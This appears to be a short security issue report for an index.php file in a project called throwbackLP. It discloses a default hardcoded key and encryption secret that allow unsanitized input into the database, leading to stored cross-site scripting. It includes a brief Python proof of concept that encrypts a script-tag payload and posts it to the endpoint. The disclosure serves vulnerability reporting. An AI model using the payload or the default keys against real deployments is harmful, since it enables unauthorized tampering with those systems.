Unsanitized input in index.php #1
Description
An attacker who is able to guess (or RE) the key (default: 123spec!alk3y456) will be able to introduce data that will be added, unsanitized, into the database. This data may be outputted to the user leading to persistent cross-site scripting.
POC
key = "123spec!alk3y456"
t = encrypt("enc="+key+"&hn=\"><script>alert(1);</script>&id=2&vn=0.1", "ZAQwsxcde321")
payload = {'pd':t}
r = requests.post("http://" + host + ":" + port + "//throwbackLP//index.php" , data=payload)